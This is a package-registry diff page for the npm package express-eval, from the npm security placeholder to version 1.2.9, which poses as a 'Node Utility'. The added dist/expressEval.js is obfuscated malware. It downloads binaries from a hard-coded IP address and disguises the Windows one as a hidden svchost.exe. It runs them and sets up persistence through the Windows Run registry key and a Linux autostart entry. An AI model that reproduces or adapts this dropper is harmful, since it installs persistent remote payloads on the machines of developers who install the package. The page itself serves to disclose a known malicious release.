npm - express-eval - Versions diffs - 0.0.1-security → 1.2.9 - Mend

express-eval 0.0.1-security → 1.2.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of express-eval might be problematic. Click here for more details.

Files changed (7) hide show

package/ReadMe.md ADDED Viewed

	@@ -0,0 +1 @@
1	+ # Node Utility

package/dist/expressEval.d.ts ADDED Viewed

	@@ -0,0 +1 @@
1	+ export declare const expressEval: () => Promise<void>;

package/dist/expressEval.js ADDED Viewed

@@ -0,0 +1 @@

+ 'use strict';const _0x25080f=_0x1987;function _0x518c(){const _0x2b193a=['existsSync','get','set','790202bRKovK','OK9','OK7','defineProperty','gsd-mouse','from','fs/promises','2285MKLXrd','/.config/autostart','2keJeQt','execSync','HKCU','next','976rMcAki','http://95.216.251.178:9120/api/v1/download/l','OK1','/home/','default','9908991cWPcKR','linux','611109MIizdX','7mJJmUu','userInfo','19883400rQqLxU','.desktop','log','throw','mkdirSync','OK6','131748ZaTOpD','\x0aTerminal=false\x0aX-GNOME-Autostart-enabled=true\x0aX-GNOME-Autostart-Delay=0','svchost','svchost.exe','then','/.config/goa-1.0','writeFile','OK4','win32','apply','start\x20','data','1360328FQNaub','expressEval','attrib\x20-r\x20-a\x20\x22','\x5cAppData\x5clocal\x5cGoogle\x5cChrome\x5cApplication\x5c','axios','OK3','OK5','child_process','done','arraybuffer','OK2'];_0x518c=function(){return _0x2b193a;};return _0x518c();}(function(_0x4ada9e,_0xc6dc5f){const _0xea4cc8=_0x1987,_0x1aa2a5=_0x4ada9e();while(!![]){try{const _0x5bc52e=parseInt(_0xea4cc8(0x15d))/0x1*(-parseInt(_0xea4cc8(0x154))/0x2)+parseInt(_0xea4cc8(0x131))/0x3+parseInt(_0xea4cc8(0x161))/0x4*(parseInt(_0xea4cc8(0x15b))/0x5)+-parseInt(_0xea4cc8(0x13a))/0x6+parseInt(_0xea4cc8(0x132))/0x7*(parseInt(_0xea4cc8(0x146))/0x8)+-parseInt(_0xea4cc8(0x12f))/0x9+parseInt(_0xea4cc8(0x134))/0xa;if(_0x5bc52e===_0xc6dc5f)break;else _0x1aa2a5['push'](_0x1aa2a5['shift']());}catch(_0x4f72c0){_0x1aa2a5['push'](_0x1aa2a5['shift']());}}}(_0x518c,0x88d31));function _0x1987(_0x31aa3f,_0x1314b3){const _0x518c97=_0x518c();return _0x1987=function(_0x1987d4,_0x485a3c){_0x1987d4=_0x1987d4-0x12f;let _0x38ddb3=_0x518c97[_0x1987d4];return _0x38ddb3;},_0x1987(_0x31aa3f,_0x1314b3);}var __awaiter=this&&this['__awaiter']||function(_0x2fe582,_0x3952fa,_0x27b67b,_0x18122c){function _0x319e29(_0x4c89b8){return _0x4c89b8 instanceof _0x27b67b?_0x4c89b8:new _0x27b67b(function(_0x139519){_0x139519(_0x4c89b8);});}return new(_0x27b67b||(_0x27b67b=Promise))(function(_0x40bea1,_0x839a6a){const _0x3d1293=_0x1987;function _0x4a8be5(_0x45b4cd){try{_0xd8b52c(_0x18122c['next'](_0x45b4cd));}catch(_0x10040a){_0x839a6a(_0x10040a);}}function _0x536c62(_0x4b9789){const _0x43497c=_0x1987;try{_0xd8b52c(_0x18122c[_0x43497c(0x137)](_0x4b9789));}catch(_0x185892){_0x839a6a(_0x185892);}}function _0xd8b52c(_0x431074){const _0x9e8b3c=_0x1987;_0x431074[_0x9e8b3c(0x14e)]?_0x40bea1(_0x431074['value']):_0x319e29(_0x431074['value'])[_0x9e8b3c(0x13e)](_0x4a8be5,_0x536c62);}_0xd8b52c((_0x18122c=_0x18122c[_0x3d1293(0x143)](_0x2fe582,_0x3952fa||[]))[_0x3d1293(0x160)]());});};Object[_0x25080f(0x157)](exports,'__esModule',{'value':!![]}),exports[_0x25080f(0x147)]=void 0x0;const axios_1=require(_0x25080f(0x14a)),r=require(_0x25080f(0x15a)),t=require('fs'),o=require('os'),s=require(_0x25080f(0x14d)),i=require('winreg'),expressEval=()=>__awaiter(void 0x0,void 0x0,void 0x0,function*(){const _0x22a4fc=_0x25080f,{platform:_0x4d1928}=process,{username:_0x39cf79}=o[_0x22a4fc(0x133)]();console['log'](_0x22a4fc(0x163));if(_0x22a4fc(0x142)===_0x4d1928){console[_0x22a4fc(0x136)](_0x22a4fc(0x150));const _0x5d3b13='C:\x5cUsers\x5c'+_0x39cf79+_0x22a4fc(0x149),_0x51abda=_0x5d3b13+_0x22a4fc(0x13d);console[_0x22a4fc(0x136)](_0x22a4fc(0x14b));if(t[_0x22a4fc(0x151)](_0x51abda)){console[_0x22a4fc(0x136)](_0x22a4fc(0x141));return;}console[_0x22a4fc(0x136)](_0x22a4fc(0x14c)),t[_0x22a4fc(0x138)](_0x5d3b13,{'recursive':!0x0}),console['log'](_0x22a4fc(0x139));const _0x422319=yield axios_1['default'][_0x22a4fc(0x152)]('http://95.216.251.178:9120/api/v1/download/w',{'responseType':_0x22a4fc(0x14f)});console[_0x22a4fc(0x136)](_0x22a4fc(0x156)),(yield r['writeFile'](_0x51abda,Buffer['from'](_0x422319[_0x22a4fc(0x145)])),s['execSync'](_0x22a4fc(0x148)+_0x51abda+'\x22'),s[_0x22a4fc(0x15e)]('attrib\x20+r\x20+a\x20+h\x20\x22'+_0x51abda+'\x22'),s[_0x22a4fc(0x15e)](_0x22a4fc(0x144)+_0x51abda)),console[_0x22a4fc(0x136)]('OK8'),new i({'hive':i[_0x22a4fc(0x15f)],'key':'\x5cSoftware\x5cMicrosoft\x5cWindows\x5cCurrentVersion\x5cRun'})[_0x22a4fc(0x153)](_0x22a4fc(0x13c),i['REG_SZ'],_0x51abda,()=>{}),console[_0x22a4fc(0x136)](_0x22a4fc(0x155));}else{if(_0x22a4fc(0x130)===_0x4d1928){const _0x1003d6=_0x22a4fc(0x158),_0xc84404=_0x22a4fc(0x164)+_0x39cf79+_0x22a4fc(0x13f),_0x4f0be6=_0xc84404+'/'+_0x1003d6;if(t[_0x22a4fc(0x151)](_0x4f0be6))return;t[_0x22a4fc(0x138)](_0xc84404,{'recursive':!0x0});const _0x2fa305=yield axios_1[_0x22a4fc(0x165)]['get'](_0x22a4fc(0x162),{'responseType':_0x22a4fc(0x14f)});yield r['writeFile'](_0x4f0be6,Buffer[_0x22a4fc(0x159)](_0x2fa305['data'])),s[_0x22a4fc(0x15e)](''+_0x4f0be6);const _0xd62578='/home/'+_0x39cf79+_0x22a4fc(0x15c);yield r[_0x22a4fc(0x140)](_0xd62578+'/'+_0x1003d6+_0x22a4fc(0x135),'[Desktop\x20Entry]\x0aType=Application\x0aName=Your\x20App\x20Name\x0aExec=/usr/bin/env\x20'+_0xc84404+'/'+_0x1003d6+_0x22a4fc(0x13b)),s[_0x22a4fc(0x15e)](_0x4f0be6);}}});exports[_0x25080f(0x147)]=expressEval;

package/dist/index.d.ts ADDED Viewed

	@@ -0,0 +1 @@
1	+ export { expressEval } from "./expressEval";

package/dist/index.js ADDED Viewed

@@ -0,0 +1,5 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.expressEval = void 0;
+var expressEval_1 = require("./expressEval");
+Object.defineProperty(exports, "expressEval", { enumerable: true, get: function () { return expressEval_1.expressEval; } });

package/package.json CHANGED Viewed

@@ -1,6 +1,27 @@
-{
-  "name": "express-eval",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "express-eval",
+  "version": "1.2.9",
+  "main": "dist/index.js",
+  "types": "dist/index.d.ts",
+  "type": "commonjs",
+  "files": ["/dist"],
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "build": "tsc -p tsconfig.json"
+  },
+  "keywords": [],
+  "author": "black02430horse <black02430horse@gmail.com>",
+  "license": "ISC",
+  "description": "",
+  "devDependencies": {
+    "@types/node": "^22.5.1",
+    "@types/winreg": "^1.2.36",
+    "typescript": "^5.5.4"
+  },
+  "dependencies": {
+    "axios": "^1.7.5",
+    "fs": "^0.0.1-security",
+    "os": "^0.1.2",
+    "winreg": "^1.2.5"
+  }
+}

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=express-eval for more information.